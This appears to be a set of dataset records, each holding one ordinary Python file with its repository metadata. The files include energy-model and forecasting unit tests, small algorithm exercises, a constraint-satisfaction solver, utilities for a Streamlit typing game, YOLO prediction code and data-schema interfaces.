(\"Wind_Solar\", \"Wind\"), (\"Wind_Solar\", \"Wind_z2\")]\n )\n actual_elcc_surf_prj = sorted(\n [(s, p) for (s, p) in instance.ELCC_SURFACE_PROJECTS]\n )\n self.assertListEqual(expected_elcc_surf_prj, actual_elcc_surf_prj)\n\n # Set: ELCC_SURFACE_PROJECTS_BY_PRM_ZONE\n expected_surface_projects_by_zone = OrderedDict(\n sorted(\n {\n \"PRM_Zone1\": [(\"Nuclear\", \"Nuclear\"), (\"Wind_Solar\", \"Wind\")],\n \"PRM_Zone2\": [(\"Wind_Solar\", \"Wind_z2\")],\n }.items()\n )\n )\n\n actual_surface_projects_by_zone = OrderedDict(\n sorted(\n {\n z: [\n (s, p)\n for (s, p) in instance.ELCC_SURFACE_PROJECTS_BY_PRM_ZONE[z]\n ]\n for z in instance.PRM_ZONES\n }.items()\n )\n )\n\n self.assertDictEqual(\n expected_surface_projects_by_zone, actual_surface_projects_by_zone\n )\n\n # Set: ELCC_SURFACE_PROJECT_PERIOD_FACETS\n expected_s_prj_p_f = sorted(\n [\n (\"Nuclear\", \"Nuclear\", 2020, 1),\n (\"Nuclear\", \"Nuclear\", 2020, 2),\n (\"Nuclear\", \"Nuclear\", 2030, 1),\n (\"Nuclear\", \"Nuclear\", 2030, 2),\n (\"Wind_Solar\", \"Wind\", 2020, 1),\n (\"Wind_Solar\", \"Wind\", 2020, 2),\n (\"Wind_Solar\", \"Wind\", 2030, 1),\n (\"Wind_Solar\", \"Wind\", 2030, 2),\n (\"Wind_Solar\", \"Wind_z2\", 2020, 1),\n (\"Wind_Solar\", \"Wind_z2\", 2020, 2),\n (\"Wind_Solar\", \"Wind_z2\", 2030, 1),\n (\"Wind_Solar\", \"Wind_z2\", 2030, 2),\n ]\n )\n\n actual_s_prj_p_f = sorted(\n [\n (s, prj, p, f)\n for (s, prj, p, f) in instance.ELCC_SURFACE_PROJECT_PERIOD_FACETS\n ]\n )\n\n self.assertListEqual(expected_s_prj_p_f, actual_s_prj_p_f)\n\n # Param: elcc_surface_coefficient\n expected_coeff = OrderedDict(\n sorted(\n {\n (\"Nuclear\", \"Nuclear\", 2020, 1): 0.9,\n (\"Nuclear\", \"Nuclear\", 2020, 2): 0.9,\n (\"Nuclear\", \"Nuclear\", 2030, 1): 0.9,\n (\"Nuclear\", \"Nuclear\", 2030, 2): 0.9,\n (\"Wind_Solar\", \"Wind\", 2020, 1): 0.3,\n (\"Wind_Solar\", \"Wind\", 2020, 2): 0.2,\n (\"Wind_Solar\", \"Wind\", 2030, 1): 0.25,\n 
(\"Wind_Solar\", \"Wind\", 2030, 2): 0.2,\n (\"Wind_Solar\", \"Wind_z2\", 2020, 1): 0.3,\n (\"Wind_Solar\", \"Wind_z2\", 2020, 2): 0.25,\n (\"Wind_Solar\", \"Wind_z2\", 2030, 1): 0.3,\n (\"Wind_Solar\", \"Wind_z2\", 2030, 2): 0.25,\n }.items()\n )\n )\n\n actual_coeff = OrderedDict(\n sorted(\n {\n (s, prj, p, f): instance.elcc_surface_coefficient[s, prj, p, f]\n for (s, prj, p, f) in instance.ELCC_SURFACE_PROJECT_PERIOD_FACETS\n }.items()\n )\n )\n self.assertDictEqual(expected_coeff, actual_coeff)\n","repo_name":"blue-marble/gridpath","sub_path":"tests/project/reliability/prm/test_elcc_surface.py","file_name":"test_elcc_surface.py","file_ext":"py","file_size_in_byte":11366,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"52"} +{"seq_id":"44291717376","text":"import sys\ninput=sys.stdin.readline\n\nNMAX=100000\nl=[0 for _ in range(NMAX+1)]\n\nn=int(input())\nfor _ in range(1,n):\n a, b= map(int,input().split())\n l[a] +=1\n l[b]+=1\n\nn=int(input())\nfor _ in range(n):\n a,b=map(int,input().split())\n if a==2:\n print('yes')\n elif a==1:\n if l[b]>=2:\n print('yes')\n else:\n print('no')\n","repo_name":"eugene028/Algorithm","sub_path":"~2021 algorithm/14675.py","file_name":"14675.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22098370204","text":"n=int(input())\nc=1\ni=2\nwhile n:\n if n%i==0:\n c+=1\n if i>n:\n break\n i+=1\n\n \nif c==2:\n print('prime')\nelse:\n print('not a prime')\n ","repo_name":"Durgaprasad-2002/codemind-python","sub_path":"prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"fa","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33997969700","text":"__author__ = [\"fkiraly\"]\n\nimport pandas as pd\nimport pytest\n\nfrom sktime.forecasting.fbprophet import Prophet\nfrom sktime.tests.test_switch import run_test_for_class\n\n\n@pytest.mark.skipif(\n not run_test_for_class(Prophet),\n reason=\"run test only if softdeps are present and incrementally (if requested)\",\n)\n@pytest.mark.parametrize(\"indextype\", [\"range\", \"period\"])\ndef test_prophet_nonnative_index(indextype):\n \"\"\"Check prophet with RangeIndex and PeriodIndex.\"\"\"\n y = pd.DataFrame({\"a\": [1, 2, 3, 4]})\n X = pd.DataFrame({\"b\": [1, 5, 3, 3, 5, 6], \"c\": [5, 5, 3, 3, 4, 2]})\n\n if indextype == \"period\":\n y.index = pd.period_range(\"2000-01-01\", periods=4)\n X.index = pd.period_range(\"2000-01-01\", periods=6)\n\n X_train = X.iloc[:4]\n X_test = X.iloc[4:]\n\n fh = [1, 2]\n\n f = Prophet()\n f.fit(y, X=X_train)\n y_pred = f.predict(fh=fh, X=X_test)\n\n if indextype == \"range\":\n assert pd.api.types.is_integer_dtype(y_pred.index)\n if indextype == \"period\":\n assert isinstance(y_pred.index, pd.PeriodIndex)\n\n\n@pytest.mark.skipif(\n not run_test_for_class(Prophet),\n reason=\"run test only if softdeps are present and incrementally (if requested)\",\n)\n@pytest.mark.parametrize(\"convert_to_datetime\", [False, True])\ndef test_prophet_period_fh(convert_to_datetime):\n \"\"\"Test Prophet with PeriodIndex based forecasting horizon, see issue #3537.\"\"\"\n from sktime.datasets import load_airline\n from sktime.forecasting.base import ForecastingHorizon\n\n y = load_airline()\n\n if convert_to_datetime:\n y = y.to_timestamp(freq=\"M\")\n\n fh_index = pd.PeriodIndex(pd.date_range(\"1961-01\", periods=36, freq=\"M\"))\n fh = 
ForecastingHorizon(fh_index, is_relative=False)\n\n forecaster = Prophet(\n seasonality_mode=\"multiplicative\",\n n_changepoints=int(len(y) / 12),\n add_country_holidays={\"country_name\": \"UnitedStates\"},\n yearly_seasonality=True,\n )\n\n forecaster.fit(y)\n\n y_pred = forecaster.predict(fh)\n\n assert len(y_pred) == len(fh_index)\n if convert_to_datetime:\n assert isinstance(y_pred.index, pd.DatetimeIndex)\n assert (y_pred.index == fh_index.to_timestamp()).all()\n else:\n assert isinstance(y_pred.index, pd.PeriodIndex)\n assert (y_pred.index == fh_index).all()\n","repo_name":"sktime/sktime","sub_path":"sktime/forecasting/tests/test_prophet.py","file_name":"test_prophet.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"71020551525","text":"import copy\nfrom typing import Generic, TypeVar, Dict, List, Set\n\nfrom constraints.Constraint import Constraint\nfrom heuristics.select_value import ValueSelector\nfrom heuristics.select_variable import VariableSelector\nfrom problem.forward_checking.DomainErasure import DomainErasure\n\nV = TypeVar('V')\nD = TypeVar('D')\n\n\nclass ConstraintSatisfactionProblem(Generic[V, D]):\n def __init__(self, variables: List[V], domains: Dict[V, Set[D]]):\n self.variables: List[V] = variables\n self.domains: Dict[V, Set[D]] = domains\n self.constraints: Dict[V, List[Constraint[V, D]]] = {}\n self.solutions = []\n self.visited_nodes = 0\n for variable in self.variables:\n self.constraints[variable] = []\n if variable not in self.domains:\n raise ValueError(\"Each variable should have a domain assigned to it\")\n\n def add_constraint(self, constraint: Constraint[V, D]):\n for variable in constraint.variables:\n if variable not in self.variables:\n raise ValueError(\"Such variable does not exist in domain\")\n self.constraints[variable].append(constraint)\n\n def consistent(self, variable: V, assignment: Dict[V, D]):\n for constraint in self.constraints[variable]:\n if not constraint.is_satisfied(assignment):\n return False\n return True\n\n def backtracking_search(self, assignment: Dict[V, D]):\n if len(assignment) == len(self.variables):\n self.solutions.append(assignment)\n return\n\n unassigned: List[V] = [v for v in self.variables if v not in assignment]\n\n to_be_assigned: V = unassigned[0]\n for value in self.domains[to_be_assigned]:\n local_assignment = assignment.copy()\n local_assignment[to_be_assigned] = value\n self.visited_nodes += 1\n if self.consistent(to_be_assigned, local_assignment):\n self.backtracking_search(local_assignment)\n\n def forward_checking(self, assignment: Dict[V, D], domains: Dict[V, Set[D]], domain_erasure: DomainErasure[V, D],\n variable_selector: VariableSelector[V, D], value_selector: ValueSelector[V, D]):\n if len(assignment) == len(self.variables):\n self.solutions.append(assignment)\n return\n\n unassigned: List[V] = [v for v in self.variables if v not in assignment]\n\n to_be_assigned: V = variable_selector.select(unassigned, domains)\n\n values = value_selector.select(list(domains[to_be_assigned]))\n\n for value in values:\n local_assignment = assignment.copy()\n local_assignment[to_be_assigned] = value\n self.visited_nodes += 1\n if self.consistent(to_be_assigned, local_assignment):\n\n domain_copy = copy.deepcopy(domains)\n\n if domain_erasure.erase(to_be_assigned, value, local_assignment, domain_copy):\n if self.consistent(to_be_assigned, local_assignment):\n self.forward_checking(local_assignment, 
domain_copy, domain_erasure, variable_selector,\n value_selector)\n","repo_name":"jakkoc/Constraint-Satisfaction-Problem","sub_path":"2/problem/ConstraintSatisfactionProblem.py","file_name":"ConstraintSatisfactionProblem.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"42629168262","text":"'Importing required libraries'\n\nimport json\nimport streamlit as st\nfrom datetime import datetime\nimport pandas as pd\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom essential_generators import DocumentGenerator\nfrom essential_generators import MarkovWordGenerator\nfrom essential_generators import MarkovTextGenerator\nimport numpy as np\nimport tqdm\nimport json\nimport re\nimport pickle\nimport keras\n\n\"\"\"\nIn this file we create the functions to log in and sign up. The users are registered in a JSON composed of name and password.\nThe check is very simple and regulated by the variable light.\nWhen a user signs up, their historical record is also initialized. Every time the user plays, their stats are updated, apart from the number of trials.\n\nAlso, this file contains all the external functions called in the game. Among them are the ranking and stats functions and the deep-learning text generation part.\n\"\"\"\n\n\ndef Authtentication(name, password):\n f = open('data/users.json') #open and load the json\n\n # returns JSON object as a dictionary\n data = json.load(f)\n\n if name in data.keys(): #check if the user exists\n if password == data[name][\"Password\"]: #check if the password is correct\n session_state = \"green\" #light green allows to go on on the app\n st.write(\"Welcome. Click Next to start playing!\")\n st.session_state.light = \"green\"\n st.session_state.Level = data[name][\"Level\"] #register the level\n st.session_state.Name = name\n\n else:\n st.write(\"Password incorrect!\") #light is still red here and the user can see the error\n\n else:\n st.write(\"Username not registered!\") #second condition error\n\n\n#This function takes name and password and registers them in the json if they're not already there.\ndef Sign_up(name, password):\n f = open('data/users.json') #open and load the json data\n\n # returns JSON object as a dictionary\n data = json.load(f)\n\n\n\n\n if name in data.keys():\n st.write(\"User is already registered!\") #check if the user is already registered with the name\n\n else:\n data[\"{}\".format(name)] = {} #create a new nested key and fill the data\n data[\"{}\".format(name)][\"Password\"] = password\n data[\"{}\".format(name)][\"Level\"] = 1\n\n #data[\"{}\".format(name)][\"Registration date\"] = datetime.today().strftime('%Y-%m-%d')\n st.write(\"Welcome to our Platform! 
Click Next to start playing!\")\n st.session_state.light = \"green\" #you can go on\n st.session_state.Level = data[name][\"Level\"] #register the data\n st.session_state.Name = name\n\n with open(\"data/users.json\", \"w\") as fp:\n json.dump(data, fp) #update the json with the new user\n\n Historical = open('data/Historical.json')\n\n # returns JSON object as a dictionary\n Hist_data = json.load(Historical)\n\n\n #Initialization of the user historical data with default values\n Hist_data[\"{}\".format(name)] = {}\n Hist_data[\"{}\".format(name)][\"Level1\"] = [1000,0,0] #time,accuracy,attempts\n Hist_data[\"{}\".format(name)][\"Level2\"] = [1000,0,0]\n Hist_data[\"{}\".format(name)][\"Level3\"] = [1000, 0,0]\n\n with open(\"data/Historical.json\", \"w\") as fp:\n json.dump(Hist_data, fp)\n\n\n\n\n#This function create the ranking table. If a user is at level 3 then it's register only in the level 3, and same for level 2 and level 1 consequently.\ndef ranking(): #Ranking function\n jsonStr = open('data/Historical.json') #open and load data\n # returns JSON object as a dictionary\n jsonStr = json.load(jsonStr)\n\n for el in jsonStr.keys(): #iterate over users\n if (jsonStr[el][\"Level3\"][0]) != 1000: #check if the user has played this level\n jsonStr[el][\"Level3\"][0] = jsonStr[el][\"Level3\"][0] - jsonStr[el][\"Level2\"][0] #The speed is registered together for all levels. Then the speed of level x is the the speed of level x - speed of level x-1.\n\n #same for level 2\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n jsonStr[el][\"Level2\"][0] = jsonStr[el][\"Level2\"][0] - jsonStr[el][\"Level1\"][0]\n\n\n #register all the data of the speed. If the user played level 3, then is registered level 3 and its speed, and then for all the levels to create a rank.\n levels3 = []\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) != 1000: # take the peolpe that did the level 3\n levels3.append([el, jsonStr[el][\"Level3\"][0], 3])\n\n levels2 = []\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) == 1000:\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n levels2.append([el, jsonStr[el][\"Level2\"][0], 2])\n\n levels1 = []\n\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) == 1000:\n if (jsonStr[el][\"Level2\"][0]) == 1000:\n if (jsonStr[el][\"Level1\"][0]) != 1000:\n levels1.append([el, jsonStr[el][\"Level1\"][0], 1])\n\n #Create a dataframe\n df = pd.DataFrame(columns=[\"Name\", \"Level\", \"Time\"])\n\n #update the dataframe with all the levels\n for el in levels3:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n for el in levels2:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n for el in levels1:\n dict = {\"Name\": el[0], \"Level\": el[2], \"Time\": el[1]}\n df = df.append(dict, ignore_index=True)\n\n return df\n\n#Function Stats for the search bar. This function take the input of the user in the homepage and return stats about the speed, attempts.\ndef stats():\n jsonStr = open('data/Historical.json') #load json data\n # returns JSON object as a dictionary\n jsonStr = json.load(jsonStr)\n\n #number of users in the platform\n Usersl = []\n Users = 0\n for el in jsonStr.keys():\n Users += 1\n Usersl.append(Users)\n\n #if the user played one level(value is not default), append the corrisponding speed and then compute the average. 
This for each level.\n times_1 = []\n times_2 = []\n times_3 = []\n\n#Usual check of existence in the level by checking the default values.\n for el in jsonStr.keys():\n if (jsonStr[el][\"Level3\"][0]) != 1000:\n jsonStr[el][\"Level3\"][0] = jsonStr[el][\"Level3\"][0] - jsonStr[el][\"Level2\"][0]\n\n if (jsonStr[el][\"Level2\"][0]) != 1000:\n jsonStr[el][\"Level2\"][0] = jsonStr[el][\"Level2\"][0] - jsonStr[el][\"Level1\"][0]\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level1\"][0] != 1000:\n times_1.append(jsonStr[el][\"Level1\"][0]) #list of speed\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level2\"][0] != 1000:\n times_2.append(jsonStr[el][\"Level2\"][0]) #list of speed\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level3\"][0] != 1000:\n times_3.append(jsonStr[el][\"Level3\"][0]) #list of speed\n\n times_1_l = [] #average lists to put inside the df\n times_2_l = []\n times_3_l = []\n\n times_1_l.append(sum(times_1) / len(times_1)) #average\n times_2_l.append(sum(times_2) / len(times_2))\n times_3_l.append(sum(times_3) / len(times_3))\n\n #compute the dataframe for speed\n df_Levels = pd.DataFrame()\n df_Levels[\"Users\"] = Usersl\n df_Levels[\"Level1\"] = times_1_l\n df_Levels[\"Level2\"] = times_2_l\n df_Levels[\"Level3\"] = times_3_l\n\n #For attemps is exactly the same\n attempt_1 = []\n attempt_2 = []\n attempt_3 = []\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level1\"][0] != 1000:\n attempt_1.append(jsonStr[el][\"Level1\"][2])\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level2\"][0] != 1000:\n attempt_2.append(jsonStr[el][\"Level2\"][2])\n\n for el in jsonStr.keys():\n if jsonStr[el][\"Level3\"][0] != 1000:\n attempt_3.append(jsonStr[el][\"Level3\"][2])\n\n attempt_1l = []\n attempt_2l = []\n attempt_3l = []\n\n attempt_1l.append(sum(attempt_1) / len(attempt_1))\n attempt_2l.append(sum(attempt_2) / len(attempt_2))\n attempt_3l.append(sum(attempt_3) / len(attempt_3))\n\n df_att = pd.DataFrame()\n df_att[\"Level1\"] = attempt_1l\n df_att[\"Level2\"] = attempt_2l\n df_att[\"Level3\"] = attempt_3l\n\n return (df_Levels,df_att) #0 and 1 output in the login page\n\n\n\ndef main_generator():\n '''\n Function that generates 3 dictionaries of sentences for the app.\n Output (json):\n 3 JSON files, each with 10 different sentences for the 3 levels of difficulty of the app.'''\n\n # Loading required data and model weights\n char2int = pickle.load(open(f\"data/wonderland.txt-char2int.pickle\", \"rb\"))\n int2char = pickle.load(open(f\"data/wonderland.txt-int2char.pickle\", \"rb\"))\n model = keras.models.load_model(f\"data/wonderland.txt-100.h5\")\n\n # Creating JSON file for the first level of difficulty of the game, with 10 sentences of 30 characters each.\n sen_level1 = sen_generator(30, 1, int2char, char2int, model)\n create_json(sen_level1, 'sen_level1')\n\n # Creating JSON file for the second level of difficulty of the game, with 10 sentences of 60 characters each.\n sen_level2 = sen_generator(60, 2, int2char, char2int, model)\n create_json(sen_level2, 'sen_level2')\n\n # Creating JSON file for the third level of difficulty of the game, with 10 sentences of 90 characters each.\n sen_level3 = sen_generator(90, 3, int2char, char2int, model)\n create_json(sen_level3, 'sen_level3')\n\n\ndef create_json(dict, name):\n '''\n Function to create a JSON file and save it in the data folder.\n Parameters:\n dict (dictionary): Includes the sentences generated as keys and the levels they correspond to as values.\n name (string): Name of the JSON file to be created.\n Output 
(json):\n JSON file generated and saved in the data folder.'''\n\n jsonString = json.dumps(dict)\n jsonFile = open(\"data/{}.json\".format(name), \"w\")\n jsonFile.write(jsonString)\n jsonFile.close()\n\ndef seed_generator():\n '''\n Function to generate a sentence using the Markov generator, transform it to lowercase and remove any punctuation marks from it.\n Output:\n seed (string): Sentence from the Markov generator without punctuation marks and in lowercase.'''\n\n gen = DocumentGenerator(text_generator=MarkovTextGenerator(), word_generator=MarkovWordGenerator())\n seed = str.lower(gen.sentence())\n seed = re.sub(r'[^\\w\\s]', '', seed)\n return seed\n\ndef sen_generator(n_chars, l, int2char, char2int, model):\n '''\n Funtion that generates a dictionary of 10 sentences for the app.\n\n Parameters:\n n_chars (int): Amount of characters requires for the generation of a sentence.\n l (int): Level of difficulty from the app to which the generated sentences correspond to.\n int2char (dict pickle file): Dictionary with characters from data source (book) converted to integers.\n char2int (dict pickle file): Dictionary with integers from data source (book) converted to characters.\n model (h5 file): File that contains the saved loaded weights of the model developed in the python notebook from the repository.\n\n Output:\n dict_sentences (dict): Dictionary of 10 sentences generated as keys and the level of difficulty (l) from the parameters as values.'''\n\n vocab_size = len(char2int)\n sequence_length = 100\n seed = seed_generator()\n sentences = []\n for i in range(0, 10):\n generated = \"\"\n for i in tqdm.tqdm(range(n_chars), \"Generating text\"):\n # Creating the input sequence\n X = np.zeros((1, sequence_length, vocab_size))\n for t, char in enumerate(seed):\n X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1\n # Predicting the next character.\n predicted = model.predict(X, verbose=0)[0]\n # Converting the vector to an integer.\n next_index = np.argmax(predicted)\n # Converting the integer to a character.\n next_char = int2char[next_index]\n # Adding the character to results 'generated'.\n generated += next_char\n # Shifting seed and the predicted character.\n seed = seed[1:] + next_char\n # Removing '\\' symbol.\n generated = re.sub(r'\\n', '', generated)\n sentences.append(generated)\n # Creating another seed for the next sentence.\n seed = seed_generator()\n # Converting list of 10 sentences into a dictionary.\n dict_sentences = {sentences[0]: 1}\n for i in sentences:\n dict_2 = {i: l}\n dict_sentences.update(dict_2)\n return dict_sentences\n\n\n\n","repo_name":"fabriziorocco/Typy-App","sub_path":"apps/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11652777232","text":"from sql_manager import get_survey_versions, get_question_versions, get_questions, get_surveys, get_questions_by_survey, insert_survey_version, insert_survey, insert_question_version, insert_question, insert_survey_question\nfrom menu import do_menu, get_int_response, get_str_response\nfrom util import get_items_of_index\n\nclass Survey_Builder:\n def __init__(self):\n self.__question_type = ['MultipleChoice', 'FillInTheBlank', 'MultipleChoiceRadio', 'Disabler']\n self.__initial_options = ['Create Survey', 'Create Questions', 'Modify Survey']\n self.__survey_version_id = -1\n self.__survey_id = -1\n self.__last_survey_question_id = -1\n self.__total_survey = {}\n 
self.__last_question_id = -1\n self.__categories = []\n self.__current_survey_version_description = \"\"\n self.__current_question_version_name = \"\" \n\n def begin(self):\n val = do_menu(\"What would you like to do (-1 for quitting) \", self.__initial_options)\n if(val == 0):\n self.create_survey()\n self.add_questions_to_survey()\n else:\n self.goodbye()\n\n\n def create_survey(self, dont_use = \"\"):\n survey_items_total = get_survey_versions()\n survey_items = get_items_of_index(survey_items_total, 1)\n val = do_menu(\"What survey version would you like to base this off of (-1 for making new survey version) \", survey_items)\n if val == -1:\n self.__survey_version_id = self.create_survey_version()\n else:\n self.__survey_version_id = survey_items_total[val][0]\n self.__current_survey_version_name = survey_items_total[val][1]\n self.__current_survey_version_description = survey_items_total[val][2]\n\n ret_val= -1\n while(ret_val == -1):\n print(\"Now to make the actual survey; (-1 to use same) \")\n survey_name = input(\"Give a survey name \")\n if survey_name == \"-1\":\n survey_name = self.__current_survey_version_name\n description = self.__current_survey_version_description\n ret_val = insert_survey(survey_name, description, self.__survey_version_id)\n else: \n description = input(\"Give a survey description \")\n ret_val = insert_survey(survey_name, description, self.__survey_version_id)\n self.__survey_id = ret_val\n return ret_val\n\n\n\n def create_survey_version(self):\n ret_val = -1\n survey_name = \"\"\n description = \"\"\n while ret_val == -1:\n survey_name = input(\"Give a survey name \")\n description = input(\"Give a survey description \")\n ret_val = insert_survey_version(survey_name, description)\n print(ret_val)\n self.__current_survey_version_name = survey_name\n self.__current_survey_version_description = description\n return ret_val\n\n\n def add_questions_to_survey(self):\n val = -1\n while val != -2:\n questions = get_questions()\n val = do_menu(\"Choose a question to add (-1 for new questions -2 to finish) \", questions, -2)\n if(val == -1):\n self.create_question_version()\n elif(val >= 0):\n self.add_question(questions[val])\n\n\n def create_question_version(self):\n question_versions = get_question_versions()\n question_version_names = get_items_of_index(question_versions, 1)\n val = do_menu(\"Choose a question version (-1 to make a new one) \", question_version_names)\n question_version_id = -1\n if(val == -1):\n while question_version_id == -1:\n version_name = input(\"What do you want to name your question? \")\n self.__current_question_version_name = version_name\n question_version_id = insert_question_version(version_name)\n else:\n question_version_id = question_versions[val][0]\n self.__current_question_version_name = question_versions[val][1]\n\n self.create_question(question_version_id)\n\n \n def create_question(self, question_version_id):\n response_id = -1\n while response_id == -1:\n question = input(\"What is the prompt for your question? (-1 for same)\")\n if question == \"-1\":\n question = self.__current_question_version_name\n question_type = self.__question_type[do_menu(\"What type of question \", self.__question_type, 0)]\n health_data = True if do_menu(\"Is there sleep data? \", [\"No\", \"Yes\"], False) == 1 else False\n answer = []\n key = 0\n if input(\"Would you like your answers to just be Yes / No? 
(y is you want this)\") == 'y':\n answer = ['Yes', 'No']\n else:\n while key != \"-1\":\n key = input(\"Provide a value \")\n answer.append(key)\n if input(f\"You are going to insert a questions {question} with answer {answer} with type {question_type} and health data {health_data} are you sure (-1 for no)\") == \"-1\":\n continue\n response_id = insert_question(question, str(answer), question_type, question_version_id, health_data) \n \n def add_question(self, val):\n survey_id = self.__survey_id\n question_id = val[0]\n last_question = self.__last_question_id\n category = \"\"\n category_num = do_menu(\"Pick a category (-1 to make new category) \", self.__categories)\n if(category_num == -1):\n self.__categories.append(input(\"Make a new category \"))\n category = self.__categories[-1]\n else:\n category = self.__categories[category_num]\n if input(f\"Are you sure you want to add question to survey {survey_id}, {question_id}, {last_question}, {category}? (-1 to not)\") == \"-1\":\n return\n self.__last_question_id = insert_survey_question(survey_id, question_id, last_question, category)\n\n \n def goodbye(self):\n print(\"Closing\")\n\n \n ","repo_name":"Greenman23/Psychology-Survey-App","sub_path":"data_insertion/survey_builder.py","file_name":"survey_builder.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39453061134","text":"import os\nimport math\nimport numpy as np\nimport time\n\ndef is_inp(name):\n return name[-4:] in ['.jpg','.JPG', '.jpeg', '.JPEG', '.png', '.PNG']\n\ndef predict(self):\n inp_path = self.hyperparameters.test\n all_inps = os.listdir(inp_path)\n all_inps = [i for i in all_inps if is_inp(i)]\n if not all_inps:\n msg = 'Failed to find any test files in {} .'\n exit('Error: {}'.format(msg.format(inp_path)))\n\n batch = min(self.hyperparameters.batch_size, len(all_inps))\n\n # predict in batches\n n_batch = int(math.ceil(len(all_inps) / batch))\n for j in range(n_batch):\n from_idx = j * batch\n to_idx = min(from_idx + batch, len(all_inps))\n\n # collect images input in the batch\n inp_feed = list(); new_all = list()\n this_batch = all_inps[from_idx:to_idx]\n for inp in this_batch:\n new_all += [inp]\n this_inp = os.path.join(inp_path, inp)\n this_inp = self.preprocess(this_inp)\n expanded = np.expand_dims(this_inp, 0)\n inp_feed.append(expanded)\n this_batch = new_all\n\n # Feed to the net\n feed_dict = {self.layers['input'] : np.concatenate(inp_feed, 0)}\n # self.say('Forwarding {} inputs ...'.format(len(inp_feed)))\n start = time.time()\n out = self.sess.run(self.layers['output'], feed_dict)\n stop = time.time(); last = stop - start\n # self.say('Total time = {}s / {} inps = {} ips'.format(\n # last, len(inp_feed), len(inp_feed) / last))\n\n\n # Post processing\n # self.say('Post processing {} inputs ...'.format(len(inp_feed)))\n start = time.time()\n for i, prediction in enumerate(out):\n # print str(i)\n # for j in prediction:\n # print j\n\n self.postprocess(prediction,\n os.path.join(inp_path, this_batch[i]))\n stop = time.time(); last = stop - start\n\n # Timing\n # self.say('Total time = {}s / {} inps = {} ips'.format(\n # last, len(inp_feed), len(inp_feed) / last))\n","repo_name":"iRiisH/yolo","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38359065129","text":"from __future__ import 
annotations\r\n\r\nfrom abc import ABC, abstractmethod\r\nfrom typing import TypeVar, Generic\r\n\r\nT_co = TypeVar('T_co', covariant=True)\r\n\r\n\r\nclass IDataContainer(ABC, Generic[T_co]):\r\n \"\"\"\r\n A structure carrying data between processing stages\r\n \"\"\"\r\n\r\n @property\r\n @abstractmethod\r\n def data(self) -> T_co:\r\n \"\"\"\r\n :return: Primary datastructure stored in this container\r\n \"\"\"\r\n ...\r\n\r\n @abstractmethod\r\n def deep_copy(self) -> IDataContainer[T_co]:\r\n ...\r\n\r\n\r\nclass ISchemaAcceptor(ABC):\r\n \"\"\"\r\n Scheme for data that is expected as input for a function\r\n \"\"\"\r\n\r\n @abstractmethod\r\n def accepts(self, output_data_scheme: IDataSchema) -> bool:\r\n \"\"\"Assess whether this scheme would accept the other data scheme as input.\r\n\r\n If the schemes are incompatible, the function may either raise an exception containing further details on why the\r\n other data scheme is not accepted as input or just return ``False``\r\n\r\n :raise DataSchemeCompatibilityError: If the data schemes are not compatible and further details are available\r\n :param output_data_scheme: Output data scheme to check for compatibility\r\n :return: ``True`` if the output data scheme is accepted as input, ``False`` otherwise\r\n \"\"\"\r\n ...\r\n\r\n\r\nclass IDataSchema(ISchemaAcceptor, ABC):\r\n \"\"\"\r\n Scheme for data that is produced by a function.\r\n \"\"\"\r\n\r\n @abstractmethod\r\n def validate(self, data_container: IDataContainer) -> bool:\r\n \"\"\"Validates that a data container fits this scheme.\r\n\r\n If this is not the case, the function may either raise an exception containing further details on why the validation\r\n failed or just return ``False``\r\n :raise DataSchemeConformityError: If the schemes are not compatible to each other and detailed information is available\r\n :param data_container: Data container to validate\r\n :return: ``True`` if the data container conforms to this scheme, ``False`` otherwise.\r\n \"\"\"\r\n ...\r\n","repo_name":"Digital-C-Fiber/openMNGlab","sub_path":"openmnglab/model/datamodel/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
